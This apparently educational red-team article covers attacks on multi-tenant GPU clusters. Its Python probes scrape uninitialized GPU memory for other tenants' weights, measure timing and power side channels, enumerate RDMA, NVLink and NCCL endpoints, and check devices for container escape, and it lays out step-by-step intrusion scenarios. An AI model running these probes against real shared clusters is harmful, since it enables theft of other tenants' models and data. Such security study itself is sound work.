Attacking GPU Compute Clusters
Expert-level analysis of attacks against GPU compute clusters used for ML training and inference, including side-channel attacks on GPU memory, CUDA runtime exploitation, multi-tenant isolation failures, and RDMA network attacks.
GPU compute clusters are the backbone of modern ML infrastructure. Organizations spend millions on NVIDIA DGX, AMD Instinct, and cloud GPU instances for training and serving models. The security of these clusters is a critical concern, yet GPU hardware and its associated software stack were designed primarily for performance, not isolation. This creates exploitable gaps that red teams can leverage to access other tenants' data, extract model weights, and disrupt training runs.
GPU Memory Architecture and Attack Surface
NVIDIA GPU Memory Hierarchy
Understanding the GPU memory hierarchy is essential for identifying data leakage opportunities:
┌──────────────────────────────────────────────────┐
│                    GPU Device                    │
│                                                  │
│ ┌──────────────────────────────────────────────┐ │
│ │              Global Memory (HBM)             │ │
│ │ ┌─────────────┐  ┌─────────────────────────┐ │ │
│ │ │Model Weights│  │ Activations / KV Cache  │ │ │
│ │ └─────────────┘  └─────────────────────────┘ │ │
│ │ ┌─────────────┐  ┌─────────────────────────┐ │ │
│ │ │  Gradients  │  │     Optimizer State     │ │ │
│ │ └─────────────┘  └─────────────────────────┘ │ │
│ └──────────────────────────────────────────────┘ │
│                                                  │
│ ┌────────────┐  ┌────────────┐  ┌────────────┐   │
│ │    SM 0    │  │    SM 1    │  │    SM N    │   │
│ │ ┌────────┐ │  │ ┌────────┐ │  │ ┌────────┐ │   │
│ │ │ Shared │ │  │ │ Shared │ │  │ │ Shared │ │   │
│ │ │ Memory │ │  │ │ Memory │ │  │ │ Memory │ │   │
│ │ └────────┘ │  │ └────────┘ │  │ └────────┘ │   │
│ │ ┌────────┐ │  │ ┌────────┐ │  │ ┌────────┐ │   │
│ │ │L1 Cache│ │  │ │L1 Cache│ │  │ │L1 Cache│ │   │
│ │ └────────┘ │  │ └────────┘ │  │ └────────┘ │   │
│ └────────────┘  └────────────┘  └────────────┘   │
│                                                  │
│ ┌──────────────────────────────────────────────┐ │
│ │               L2 Cache (Shared)              │ │
│ └──────────────────────────────────────────────┘ │
└──────────────────────────────────────────────────┘
Uninitialized Memory Exploitation
GPU memory is not automatically cleared between kernel launches or between processes sharing a GPU. This is the most accessible attack vector in multi-tenant environments:
import torch
import numpy as np
def probe_gpu_memory(allocation_size_mb: int = 512, num_probes: int = 10):
"""
Probe GPU memory for residual data from previous allocations.
In multi-tenant environments, this may contain fragments of
other users' model weights, activations, or input data.
"""
findings = []
for probe_idx in range(num_probes):
# Allocate without initialization — reads whatever is in memory
tensor = torch.empty(
allocation_size_mb * 1024 * 1024 // 4, # float32 elements
dtype=torch.float32,
device="cuda"
)
# Analyze contents for non-zero patterns
nonzero_ratio = (tensor != 0).float().mean().item()
value_range = (tensor.min().item(), tensor.max().item())
# Check for structured patterns (model weights have characteristic distributions)
std = tensor.std().item()
mean = tensor.abs().mean().item()
if nonzero_ratio > 0.01: # More than 1% non-zero indicates residual data
findings.append({
"probe": probe_idx,
"nonzero_ratio": nonzero_ratio,
"value_range": value_range,
"std": std,
"mean_abs": mean,
"likely_content": classify_residual_data(std, mean),
})
del tensor
torch.cuda.empty_cache()
return findings
def classify_residual_data(std: float, mean_abs: float) -> str:
"""Heuristic classification of residual GPU memory contents."""
if 0.01 < std < 0.1 and mean_abs < 0.05:
return "likely_model_weights (small initialization)"
elif 0.1 < std < 2.0:
return "likely_activations_or_gradients"
elif std > 10.0:
return "likely_optimizer_state (Adam momentum/variance)"
elif mean_abs < 1e-6:
return "likely_zeroed_or_sparse"
else:
        return "unknown_structured_data"

Side-Channel Attacks on GPU Workloads
Timing Side Channels
GPU kernel execution times leak information about the data being processed:
import torch
import numpy as np
import time
def timing_side_channel_probe(target_gpu: int = 0):
"""
Measure GPU kernel execution timing to infer characteristics
of co-located workloads. Execution time correlates with:
- Model size (number of parameters)
- Batch size (number of inputs processed)
- Sequence length (for transformer models)
- Sparsity patterns in data
"""
torch.cuda.set_device(target_gpu)
timings = []
for _ in range(1000):
# Launch a small probe kernel
probe = torch.randn(64, 64, device="cuda")
torch.cuda.synchronize()
start = time.perf_counter_ns()
result = torch.matmul(probe, probe)
torch.cuda.synchronize()
end = time.perf_counter_ns()
timings.append(end - start)
timings = np.array(timings)
# Timing variance indicates resource contention from co-located workloads
return {
"mean_ns": np.mean(timings),
"std_ns": np.std(timings),
"p99_ns": np.percentile(timings, 99),
"bimodal": detect_bimodal_distribution(timings),
"contention_detected": np.std(timings) > np.mean(timings) * 0.1,
}
def detect_bimodal_distribution(data: np.ndarray) -> bool:
"""Bimodal timing suggests batch processing boundaries in co-located workload."""
from scipy import stats
    # Rejecting normality is a weak proxy for bimodality: batch boundaries
    # in a co-located workload tend to produce a second timing mode
    _, p_value = stats.normaltest(data)
    return p_value < 0.001

Power and Thermal Side Channels
GPU power consumption and thermal readings are accessible through management interfaces and correlate with workload characteristics:
def monitor_gpu_power_channel(duration_seconds: int = 60, sample_rate_hz: int = 10):
"""
Monitor GPU power consumption as a side channel.
Power draw patterns reveal:
- Training vs. inference workload type
- Batch processing cadence
- Model architecture characteristics
"""
import subprocess
import time
readings = []
interval = 1.0 / sample_rate_hz
for _ in range(duration_seconds * sample_rate_hz):
# nvidia-smi provides power and utilization data
result = subprocess.run(
["nvidia-smi",
"--query-gpu=power.draw,utilization.gpu,temperature.gpu,memory.used",
"--format=csv,noheader,nounits"],
capture_output=True, text=True
)
if result.returncode == 0:
values = result.stdout.strip().split(", ")
readings.append({
"timestamp": time.time(),
"power_w": float(values[0]),
"util_pct": float(values[1]),
"temp_c": float(values[2]),
"mem_used_mb": float(values[3]),
})
time.sleep(interval)
return analyze_power_patterns(readings)
def analyze_power_patterns(readings: list) -> dict:
"""Extract workload characteristics from power consumption patterns."""
    powers = [r["power_w"] for r in readings]
    # Detect periodic patterns (training loop cadence)
    import numpy as np
    from scipy.signal import find_peaks
    peaks, _ = find_peaks(powers, height=np.mean(powers))
    if len(peaks) > 2:
        intervals = np.diff(peaks)
        # Peak indices count samples; divide by the 10 Hz sample rate for seconds
        cadence = np.median(intervals) / 10
return {
"workload_type": "training" if cadence > 1.0 else "inference",
"batch_cadence_seconds": cadence,
"peak_power_w": max(powers),
"avg_power_w": np.mean(powers),
}
    return {"workload_type": "inference_or_idle", "avg_power_w": np.mean(powers)}

| Side Channel | Data Leaked | Accuracy | Requirements |
|---|---|---|---|
| Kernel timing | Model size, batch size, sequence length | Medium | Co-located process on same GPU |
| Power analysis | Training cadence, workload type | High | nvidia-smi access |
| Memory bandwidth | Data transfer patterns, model loading | Medium | Performance counter access |
| PCIe traffic | Host-device data movement patterns | Low | PCIe monitoring capability |
| Thermal patterns | Sustained vs. burst compute | Low | Temperature sensor access |
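The memory-bandwidth channel in the table can be probed without performance-counter access by timing bulk host-to-device copies: a co-located tenant saturating HBM or the PCIe link shows up as reduced or erratic effective bandwidth. A minimal sketch, assuming copy timing as the probe mechanism (the function name, buffer size, and interpretation thresholds are illustrative, not an established tool):

```python
import time
import torch

def probe_copy_bandwidth(size_mb: int = 256, trials: int = 20) -> dict:
    """Estimate effective host-to-device copy bandwidth in GB/s.

    A drop versus the link's rated bandwidth, or high spread across
    trials, hints at contention from a co-located workload.
    """
    # Pinned host memory gives stable, DMA-driven transfers
    src = torch.randn(size_mb * 1024 * 1024 // 4, dtype=torch.float32).pin_memory()
    bandwidths = []
    for _ in range(trials):
        torch.cuda.synchronize()
        start = time.perf_counter()
        dst = src.to("cuda")
        torch.cuda.synchronize()
        elapsed = time.perf_counter() - start
        bandwidths.append((size_mb / 1024) / elapsed)  # GB transferred / seconds
        del dst
    return {
        "mean_gbps": sum(bandwidths) / len(bandwidths),
        "min_gbps": min(bandwidths),
        # Large spread across trials suggests bursty contention
        "spread_gbps": max(bandwidths) - min(bandwidths),
    }
```

Sampling this repeatedly over time yields a bandwidth trace that can be correlated with the timing and power channels above.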
Multi-Tenant GPU Isolation Mechanisms
NVIDIA Multi-Instance GPU (MIG)
MIG (Multi-Instance GPU) provides the strongest available isolation for GPU multi-tenancy:
def assess_mig_isolation(gpu_index: int = 0):
"""Assess MIG partition isolation on NVIDIA A100/H100 GPUs."""
    import subprocess
findings = []
# List MIG instances
result = subprocess.run(
["nvidia-smi", "mig", "-lgi", "-i", str(gpu_index)],
capture_output=True, text=True
)
findings.append({"mig_instances": result.stdout})
# Check MIG mode status
result = subprocess.run(
["nvidia-smi", "--query-gpu=mig.mode.current", "--format=csv,noheader",
"-i", str(gpu_index)],
capture_output=True, text=True
)
mig_enabled = "Enabled" in result.stdout
if not mig_enabled:
findings.append({
"severity": "HIGH",
"finding": "MIG not enabled on multi-tenant GPU",
"impact": "No hardware isolation between tenants",
})
# Even with MIG, check for shared resources
findings.append({
"note": "MIG isolates compute and memory but shares: "
"PCIe bus, NVLink, video encoder/decoder, "
"GPU management processor",
})
    return findings

NVIDIA Multi-Process Service (MPS)
MPS (Multi-Process Service) provides performance benefits but weaker isolation:
| Isolation Mechanism | Compute Isolation | Memory Isolation | Fault Isolation | Performance Overhead |
|---|---|---|---|---|
| MIG | Hardware-partitioned SMs | Separate memory partitions | Full -- crash contained | 0% (dedicated resources) |
| MPS | Shared SMs, time-multiplexed | Shared address space | None -- one crash kills all | Low |
| Time-slicing | Round-robin scheduling | No isolation | None | Medium (context switching) |
| vGPU | Hypervisor-mediated | Hypervisor-enforced | Full | 5-15% |
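Because the table shows MPS offers no fault isolation, checking whether MPS is active is worth doing explicitly during an assessment. A minimal detection sketch (`detect_mps` is a hypothetical helper; the daemon name `nvidia-cuda-mps-control` and the default pipe directory `/tmp/nvidia-mps`, overridable via `CUDA_MPS_PIPE_DIRECTORY`, follow NVIDIA's documented conventions):

```python
import os
import subprocess

def detect_mps(pipe_dir: str = "") -> dict:
    """Check whether NVIDIA MPS appears active on this host."""
    pipe_dir = pipe_dir or os.environ.get("CUDA_MPS_PIPE_DIRECTORY", "/tmp/nvidia-mps")
    try:
        daemon = subprocess.run(
            ["pgrep", "-f", "nvidia-cuda-mps-control"],
            capture_output=True, text=True,
        )
        active = daemon.returncode == 0
    except FileNotFoundError:
        # pgrep unavailable; fall back to the pipe-directory check only
        active = False
    return {
        "mps_daemon_running": active,
        "pipe_dir_present": os.path.isdir(pipe_dir),
        # With MPS, clients share one GPU address space and fault domain
        "severity": "HIGH" if active else "INFO",
        "finding": ("MPS active: tenants share a GPU address space"
                    if active else "MPS not detected"),
    }
```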
RDMA and Interconnect Attacks
InfiniBand and RoCE Exploitation
High-performance GPU clusters use RDMA for inter-node communication during distributed training:
def enumerate_rdma_endpoints():
"""
Enumerate RDMA-capable network interfaces and endpoints.
RDMA traffic bypasses the kernel network stack, meaning
standard firewall rules and network policies do not apply.
"""
    import shutil
    import subprocess

    def run(cmd):
        # Probe helper: RDMA tooling may be absent on non-fabric nodes
        if shutil.which(cmd[0]) is None:
            return None
        return subprocess.run(cmd, capture_output=True, text=True)

    findings = []
    # Check for RDMA devices
    result = run(["ibv_devices"])
    if result is not None and result.returncode == 0:
        findings.append({
            "finding": "RDMA devices present",
            "devices": result.stdout,
            "severity": "INFO",
        })
    # Check InfiniBand port state and connectivity
    result = run(["ibstat"])
    if result is not None and result.returncode == 0:
        findings.append({
            "finding": "InfiniBand status",
            "status": result.stdout,
        })
    # Enumerate active RDMA connection identifiers
    result = run(["rdma", "resource", "show", "cm_id"])
    if result is not None and result.returncode == 0:
        findings.append({
            "finding": "Active RDMA connections",
            "connections": result.stdout,
            "note": "These connections bypass the kernel network stack and firewalls",
        })
    # Check for GPUDirect RDMA capability via NVLink status
    result = run(["nvidia-smi", "nvlink", "--status"])
    if result is not None and result.returncode == 0:
        findings.append({
            "finding": "NVLink status (GPUDirect capable)",
            "status": result.stdout,
        })
    return findings

NVLink and NVSwitch Attacks
In multi-GPU systems (DGX, HGX), NVLink provides direct GPU-to-GPU memory access:
def probe_nvlink_topology():
"""
Map NVLink topology to identify potential cross-GPU
data access paths. NVLink enables GPUDirect which allows
one GPU to directly read/write another GPU's memory.
"""
import subprocess
result = subprocess.run(
["nvidia-smi", "topo", "-m"],
capture_output=True, text=True
)
topology = result.stdout
# Parse topology matrix for NVLink connections
# NV# indicates NVLink connection with # links
# SYS indicates cross-socket (slower)
# PHB indicates same PCIe host bridge
return {
"topology": topology,
"note": "GPUs connected via NVLink can perform direct memory "
"access (peer-to-peer). If GPU 0 and GPU 1 are NVLink-connected "
"and run different tenants' workloads, a CUDA program on GPU 0 "
"can potentially read GPU 1's memory via cuMemcpyPeer.",
    }

CUDA Runtime Exploitation
Driver and Runtime Vulnerabilities
The CUDA software stack presents a significant attack surface:
| Component | Vulnerability Class | Example CVEs | Impact |
|---|---|---|---|
| NVIDIA Kernel Driver | Privilege escalation | CVE-2024-0071, CVE-2024-0074 | Host compromise from container |
| CUDA Runtime | Memory corruption | CVE-2023-31021 | Code execution in GPU context |
| cuDNN | Buffer overflow | Various | Arbitrary code execution |
| NCCL | Unauthenticated access | Design issue | Distributed training data interception |
| nvidia-persistenced | Local privilege escalation | CVE-2024-0090 | Root access from GPU user |
def assess_cuda_attack_surface():
"""Enumerate CUDA stack components and known vulnerability exposure."""
import subprocess
components = {}
# Driver version
result = subprocess.run(
["nvidia-smi", "--query-gpu=driver_version", "--format=csv,noheader"],
capture_output=True, text=True
)
components["driver_version"] = result.stdout.strip()
    # CUDA toolkit version (nvcc may be absent on inference-only nodes)
    try:
        result = subprocess.run(["nvcc", "--version"], capture_output=True, text=True)
        components["cuda_version"] = result.stdout
    except FileNotFoundError:
        components["cuda_version"] = "nvcc not found"
# Check for known vulnerable driver versions
driver_ver = components["driver_version"]
known_vulnerable = {
"535.104": ["CVE-2024-0071"], # Example
"535.86": ["CVE-2023-31021"],
}
for vuln_ver, cves in known_vulnerable.items():
if driver_ver.startswith(vuln_ver):
components["vulnerabilities"] = cves
    return components

Cluster-Level Attack Scenarios
Scenario 1: Cross-Tenant Data Extraction
1. Attacker obtains legitimate access to a GPU instance in a shared cluster
2. Probe uninitialized GPU memory for residual data from previous tenant
3. Use timing side channels to determine when co-located workload processes batches
4. Allocate and read GPU memory immediately after co-located workload releases it
5. Reconstruct model weights or training data fragments from recovered memory
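Steps 2 and 4 of this scenario can be sketched as a tight allocate-and-filter loop built on the uninitialized-`torch.empty` behavior shown earlier. The function name and the statistical thresholds are illustrative heuristics, not calibrated values:

```python
import torch

def scavenge_after_release(rounds: int = 50, chunk_mb: int = 64) -> list:
    """Repeatedly allocate uninitialized GPU memory and keep chunks
    whose value distribution resembles trained model weights."""
    recovered = []
    for _ in range(rounds):
        # Uninitialized allocation: contents are whatever the previous
        # owner left behind (subject to driver/platform scrubbing)
        buf = torch.empty(chunk_mb * 1024 * 1024 // 4,
                          dtype=torch.float32, device="cuda")
        finite = buf[torch.isfinite(buf)]
        if finite.numel() == 0:
            del buf
            continue
        std = finite.std().item()
        # Trained weights typically concentrate in a narrow near-zero band
        if 1e-3 < std < 1.0 and finite.abs().mean().item() < 0.5:
            recovered.append(finite.cpu())
        del buf
    return recovered
```

Running the loop immediately after a co-located workload releases memory (step 4) maximizes the chance of catching unscrubbed pages before they are reallocated.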
Scenario 2: Distributed Training Interception
1. Gain access to the training cluster network (InfiniBand or RoCE fabric)
2. Enumerate NCCL communication endpoints (default: no authentication)
3. Join the NCCL communication ring by impersonating a training worker
4. Intercept gradient updates transmitted between nodes during allreduce operations
5. Reconstruct model updates and potentially training data from gradient information
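Step 2 can be approximated from inside the fabric by probing training nodes for open rendezvous ports. The port list below is an assumption based on common defaults (for example, torchrun's default MASTER_PORT of 29500); an open port only indicates a listener and does not by itself complete the step-3 ring join, which requires matching the job's rank/world-size handshake (unauthenticated by default in NCCL):

```python
import socket

# Assumed candidate ports based on common distributed-training defaults;
# verify against the target stack's actual configuration
CANDIDATE_PORTS = [29400, 29500, 29501]

def find_rendezvous_endpoints(hosts: list, timeout: float = 0.5) -> list:
    """Return (host, port) pairs with an open TCP listener on a
    candidate rendezvous/bootstrap port."""
    open_endpoints = []
    for host in hosts:
        for port in CANDIDATE_PORTS:
            try:
                # A successful connect means something is listening
                with socket.create_connection((host, port), timeout=timeout):
                    open_endpoints.append((host, port))
            except OSError:
                continue
    return open_endpoints
```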
Scenario 3: GPU-Assisted Container Escape
1. From within a GPU-enabled container, access /dev/nvidia* device files
2. Use GPU memory mapping to probe host memory regions accessible through DMA
3. Exploit NVIDIA driver vulnerabilities for kernel-level privilege escalation
4. Use GPU DMA capabilities to read or write host memory outside container boundaries
5. Establish persistence through GPU firmware or driver-level modifications
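Step 1 reduces to enumerating the device nodes the container runtime has passed through. A sketch (`enumerate_gpu_device_files` is a hypothetical helper; `/dev/nvidiactl` and `/dev/nvidia-uvm` are standard NVIDIA driver nodes):

```python
import glob
import os
import stat

def enumerate_gpu_device_files() -> list:
    """List exposed /dev/nvidia* nodes and flag those the caller can
    write to, since writable control nodes expose the driver's
    ioctl attack surface (steps 2-3 of the scenario)."""
    findings = []
    for path in sorted(glob.glob("/dev/nvidia*")):
        st = os.stat(path)
        findings.append({
            "device": path,
            "char_device": stat.S_ISCHR(st.st_mode),
            "world_writable": bool(st.st_mode & stat.S_IWOTH),
            "writable_by_caller": os.access(path, os.W_OK),
        })
    return findings
```

An empty result from inside a supposedly GPU-enabled container is itself informative: it indicates device passthrough is mediated rather than direct.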
Related Topics
- Attacking AI Deployments -- general deployment infrastructure attacks
- Kubernetes Security for ML Workloads -- Kubernetes-specific ML infrastructure security
- Infrastructure Exploitation -- broader infrastructure exploitation techniques
- Model Supply Chain Risks -- model-level supply chain attacks
- Distributed Training Attacks -- attacking the training process itself
References
- Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (2018) - Foundational research demonstrating practical GPU side-channel attacks across co-located processes
- Wei et al., "Leaky DNN: Stealing Deep-Learning Model Secret with GPU Context-Switching Side-Channel" (2020) - GPU context switching as a model extraction side channel
- NVIDIA Multi-Instance GPU User Guide (2025) - Official MIG documentation covering partition configurations and isolation guarantees
- NVIDIA Container Toolkit Security Best Practices (2025) - Security guidance for GPU containers including device isolation
- Hu et al., "Security Analysis of RDMA-based Data Center Networks" (2023) - RDMA security analysis in data center environments
Why are standard Kubernetes network policies insufficient for securing GPU cluster communication during distributed training?